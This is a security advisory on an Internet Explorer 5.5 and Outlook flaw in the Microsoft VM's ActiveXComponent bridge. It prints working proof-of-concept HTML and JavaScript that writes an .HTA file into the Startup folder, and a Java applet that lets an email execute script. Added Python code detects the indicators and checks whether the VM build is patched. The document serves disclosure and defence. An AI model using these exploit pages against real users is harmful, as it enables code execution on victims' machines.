COMMAND

    IE (com.ms.activeX.ActiveXComponent)

SYSTEMS AFFECTED

    IE 5.5 / Outlook (Microsoft VM builds prior to 3318)

PROBLEM

    The following is based on Georgi Guninski security advisory #23.
    Internet Explorer 5.5 and Outlook allow executing arbitrary programs
    after viewing a web page or email message.  This may lead to taking
    full control over the user's computer.

    The problem is the com.ms.activeX.ActiveXComponent Java object, the
    Microsoft VM's bridge class for creating and scripting COM objects
    from Java.  It may be instantiated directly from an <APPLET> tag:
    the VM logs a security exception in the Java console, yet still
    returns a usable object to the page's script.  Through that object
    the page can create and script arbitrary ActiveX objects, including
    those not marked safe for scripting, so the "safe for scripting"
    restriction that IE normally enforces on scripted controls no longer
    holds.  Examine the code below for more information.

    The code is:

        ---------javaea.html------------------------------------------
        <APPLET code="com.ms.activeX.ActiveXComponent" >
        </APPLET>
        <!-- ^^^ This gives java exceptions in the java console, but the object is instantiated -->


        <SCRIPT LANGUAGE="JAVASCRIPT">
        a1=document.applets[0];
        // Relative path into the user's Startup folder: an .HTA dropped
        // there runs as a trusted application at the next logon.
        fn="..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA";
        //fn="EA.HTA";
        // Contents of the dropped .HTA; harmless here, but any code would do.
        doc="<SCRIPT>s1=\'Hello world\\nTo get rid of this, delete the file EA.HTA in Startup folder\';alert(s1);document.body.innerHTML=s1</"+"SCRIPT>";
        function f1()
        {
        a1.setProperty('DOC',doc);
        }

        function f()
        {
        // CLSID of Scriptlet.TypeLib, which is not marked safe for scripting;
        // its Path/Doc properties and Write method write an arbitrary file.
        cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
        a1.setCLSID(cl);
        a1.createInstance();
        // The COM calls are sequenced with timeouts so each step has
        // completed before the next one runs.
        setTimeout("a1.setProperty('Path','"+fn+"')",1000);
        setTimeout("f1()",1500);
        setTimeout("a1.invoke('write',VA);alert('"+fn+" created');",2000);
        }
        setTimeout("f()",1000)
        </SCRIPT>

        <SCRIPT LANGUAGE="VBSCRIPT">
        VA = ARRAY()
        ' An empty VBScript array: invoke() expects its argument list as
        ' something like com.ms.com.Variant[], and an empty array satisfies it.
        </SCRIPT>

    Regarding this issue and Outlook with the "Outlook security update"
    (probably this should be another advisory): it is a bit more
    difficult to exploit from Outlook, because the update stops "most
    scripting".  It is a common misconception that the "Outlook security
    update" stops all scripting, but this is not true.  It is possible
    to trigger the execution of Active Script from an email message with
    the help of Java: an applet loaded with MAYSCRIPT can call back into
    the page's script engine through netscape.javascript.JSObject, and
    an IFRAME in the message fetches the page carrying that applet from
    a web server.

    Send an email message containing

        <IFRAME SRC="http://somehost/javascript.html"></IFRAME>

    The code:

        -----------javascript.html-------------
        <APPLET CODE="outlookjs.class" MAYSCRIPT>
        <PARAM NAME="command" VALUE="window.open('http://www.guninski.com')">
        </APPLET>
        ----------outlookjs.java---------------
        import java.applet.Applet;
        import netscape.javascript.*;

        // Bridges from Java back into the page's script engine: MAYSCRIPT on
        // the APPLET tag permits JSObject access, and eval() runs whatever
        // script the "command" parameter carries.  The class must be public
        // for the applet loader to instantiate it.
        public class outlookjs extends Applet {
            public JSObject j;

            public void init() {
                try {
                    j = JSObject.getWindow(this);
                    j.eval(getParameter("command"));
                } catch (Exception e) {
                    System.out.println(e);
                }
            }
        }
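    Both exploit paths above leave recognisable marks in the HTML: the
    ActiveXComponent applet and the Scriptlet.TypeLib CLSID on the web
    page side, and the remote IFRAME plus a MAYSCRIPT applet on the mail
    side.  The scanner below is an added example for this page, not code
    from the advisory or from Microsoft; it is the kind of check a mail
    gateway or proxy could run over an HTML body.  The indicator names
    and the sample documents (trimmed from the advisory's fragments) are
    this example's own.

```python
"""Flag HTML that carries the Microsoft VM indicators from this advisory.

Added example for this page, not code from the advisory or from Microsoft.
A document is scanned for:

  applet-activexcomponent : <APPLET CODE="com.ms.activeX.ActiveXComponent">
  clsid-scriptlet-typelib : the Scriptlet.TypeLib CLSID the exploit
                            instantiates, in script text or an OBJECT tag
  mail-applet-mayscript   : an applet with MAYSCRIPT (JSObject bridge),
                            reported only for mail bodies
  mail-remote-iframe      : an IFRAME pulling a remote page into a mail body
"""
import re
from html.parser import HTMLParser

ACTIVEX_BRIDGE = "com.ms.activex.activexcomponent"
SCRIPTLET_TYPELIB = "06290bd5-48aa-11d2-8432-006008c3fbfc"
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftp)://", re.I)


class _Scanner(HTMLParser):
    """Tag-level checks; script bodies reach handle_data only, not the tag hooks."""

    def __init__(self, in_mail):
        super().__init__()
        self.in_mail = in_mail
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names; a bare attribute
        # such as MAYSCRIPT arrives with value None.
        a = {name: (value or "") for name, value in attrs}
        if tag == "applet":
            if a.get("code", "").strip().lower() == ACTIVEX_BRIDGE:
                self.findings.add("applet-activexcomponent")
            if self.in_mail and "mayscript" in a:
                self.findings.add("mail-applet-mayscript")
        elif tag == "iframe" and self.in_mail:
            if REMOTE_URL_RE.match(a.get("src", "")):
                self.findings.add("mail-remote-iframe")


def scan_html(html, in_mail=False):
    """Return the sorted indicator names found in one HTML document."""
    scanner = _Scanner(in_mail)
    scanner.feed(html)
    scanner.close()
    findings = scanner.findings
    # The CLSID is handed to setCLSID() inside script text, so match it on
    # the raw document; this also covers <OBJECT CLASSID="clsid:..."> forms.
    for guid in GUID_RE.findall(html):
        if guid.lower() == SCRIPTLET_TYPELIB:
            findings.add("clsid-scriptlet-typelib")
    return sorted(findings)


# Constructed samples, trimmed from the fragments quoted in the advisory.
SAMPLE_JAVAEA = """
<APPLET code="com.ms.activeX.ActiveXComponent"></APPLET>
<SCRIPT LANGUAGE="JAVASCRIPT">
a1=document.applets[0];
cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
a1.setCLSID(cl);
a1.createInstance();
</SCRIPT>
"""
SAMPLE_MAIL_BODY = '<IFRAME SRC="http://somehost/javascript.html"></IFRAME>'
SAMPLE_JAVASCRIPT_HTML = """
<APPLET CODE="outlookjs.class" MAYSCRIPT>
<PARAM NAME="command" VALUE="window.open('http://www.guninski.com')">
</APPLET>
"""
SAMPLE_BENIGN = '<p>Hello</p><applet code="Clock.class" width="100" height="50"></applet>'

if __name__ == "__main__":
    for label, doc, mail in [("javaea.html", SAMPLE_JAVAEA, False),
                             ("mail body", SAMPLE_MAIL_BODY, True),
                             ("javascript.html", SAMPLE_JAVASCRIPT_HTML, True),
                             ("benign mail", SAMPLE_BENIGN, True)]:
        print(f"{label:16s} {scan_html(doc, in_mail=mail)}")
```

    The MAYSCRIPT and remote-IFRAME indicators are only reported for
    mail bodies, where a message has no business loading a scripted
    applet from the network; on an ordinary web page both are common and
    would only produce noise.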

    Demonstration is available at:

        http://www.guninski.com/javaea1.html
        http://www.guninski.com/javaea2.html

SOLUTION

    Until the VM update below is applied, disable Active Scripting, Java,
    or scripting of Java applets; better, disable all active content in
    IE.  Note that the bridge object lives in the Microsoft VM itself,
    so the fix is a VM upgrade rather than a kill bit for one control.

    Patch availability:

        - 2000-series Microsoft VM customers will be provided with an update soon.
        - 3100-series Microsoft VM customers upgrade to build 3318 or later from:
          http://www.microsoft.com/java/vm/dl_vm40.htm
        - 3200-series Microsoft VM customers upgrade to build 3318 or later from:
          http://www.microsoft.com/java/vm/dl_vm40.htm
        - 3300-series Microsoft VM customers upgrade to build 3318 or later from:
          http://www.microsoft.com/java/vm/dl_vm40.htm

    This fix supersedes the patch supplied in MS00-059.
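    The patch list above turns on the VM build number, so a practitioner
    auditing machines wants that number read out and compared.  The
    script below is an added example for this page, not a Microsoft
    tool.  It takes the build from the banner that jview prints when run
    with no arguments; the banner lines in it are constructed, and the
    "Version major.minor.build" layout, as well as the rule that builds
    below 3000 form the 2000-series, are assumptions to check against
    the jview output on your own machine.

```python
"""Decide from the Microsoft VM build number whether this fix is in place.

Added example for this page, not a Microsoft tool.  It encodes the patch
availability list: builds 3318 and later carry the fix, 3100/3200/3300-
series builds below 3318 must be upgraded, and for the 2000-series no
fixed build is listed yet.
"""
import re

FIXED_BUILD = 3318
# Assumed banner layout: "... Version 5.00.3318"; the build is the last part.
VERSION_RE = re.compile(r"Version\s+(\d+)\.(\d+)\.(\d+)")


def parse_build(jview_banner):
    """Return the VM build number from a jview banner, or None if absent."""
    m = VERSION_RE.search(jview_banner)
    return int(m.group(3)) if m else None


def vm_series(build):
    """Map a build to the series names used in the patch list.

    Assumed rule: builds below 3000 are the 2000-series; the rest are
    grouped by hundreds (3100, 3200, 3300, ...)."""
    return 2000 if build < 3000 else (build // 100) * 100


def assess(jview_banner):
    """Return (series, vulnerable, advice) for one jview banner."""
    build = parse_build(jview_banner)
    if build is None:
        return (None, None, "no Microsoft VM version found; is jview present?")
    series = vm_series(build)
    if build >= FIXED_BUILD:
        return (series, False, f"build {build} already includes the fix")
    if series == 2000:
        return (series, True, "2000-series VM: wait for Microsoft's update")
    return (series, True, f"{series}-series VM: upgrade to build {FIXED_BUILD} or later")


# Constructed banners in the assumed jview layout.
SAMPLE_BANNERS = [
    "Microsoft (R) Command-line Loader for Java Version 5.00.3240",
    "Microsoft (R) Command-line Loader for Java Version 5.00.3318",
    "Microsoft (R) Command-line Loader for Java Version 4.79.2339",
    "'jview' is not recognized as an internal or external command",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(assess(banner))
```

    Feed it the real banner with something like
    `python check_vm.py < jview_output.txt` after adding a stdin read, or
    paste the banner into SAMPLE_BANNERS; a machine without jview at all
    has no Microsoft VM to patch, which is the fourth sample's case.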